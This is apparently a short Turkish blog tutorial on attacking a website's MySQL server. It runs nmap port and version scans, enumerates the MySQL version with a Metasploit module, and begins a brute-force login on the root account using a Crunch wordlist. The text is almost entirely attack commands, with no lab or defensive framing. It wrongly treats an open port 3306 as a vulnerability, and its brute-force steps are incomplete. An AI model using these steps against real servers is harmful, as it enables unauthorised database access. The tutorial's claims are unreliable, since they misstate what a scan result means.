## Nmap Gidelim ##
Nmap İle bir sitede port taraması yaptınız farzediyorum ;
nmap -v -sT [İP ADRESİ]
ve açık olan portlardan biri 3306 mysql port olduğunu gördünüz.MySQL portunda bir açık var.
şimdi o portu görelim ;
nmap -sT -sV -Pn -p 3306 [İP ADRESİ]
## M etasploite Geçelim ##
msfconsole
Bu modül, MySQL sunucuları çalışan sürümü sıralar. (mysql_version)
use auxiliary/scanner/mysql/mysql_version
Seçenekleri Gösterelim.
show options
RHOSTS parametresi ayarlayın.
set RHOSTS [İP ADRESİ]
Threads Seçelim.
set THREADS 50
ve Çalıştıralım.
run
daha sonra ekranda çalışan bir sürüm gösterecektir.
## MySQL Brute Force Denemesi ##
Brute Force saldırısını başlatalım. RHOSTS seçeneği ayarlamak için bir kullanıcı adı ve bir şifre seçin.
K.Adı belirleyelim.
SET USERNAME root
Şifre Bölümünüde Kali Linuxta “Crunch “ Wordlist oluşturabilirsiniz ve Saldırıya dahil edebilirsiniz.Crunch ile wordlist oluştumayacaksanız şifre bölümü boş kalacak.
Yorum bırakın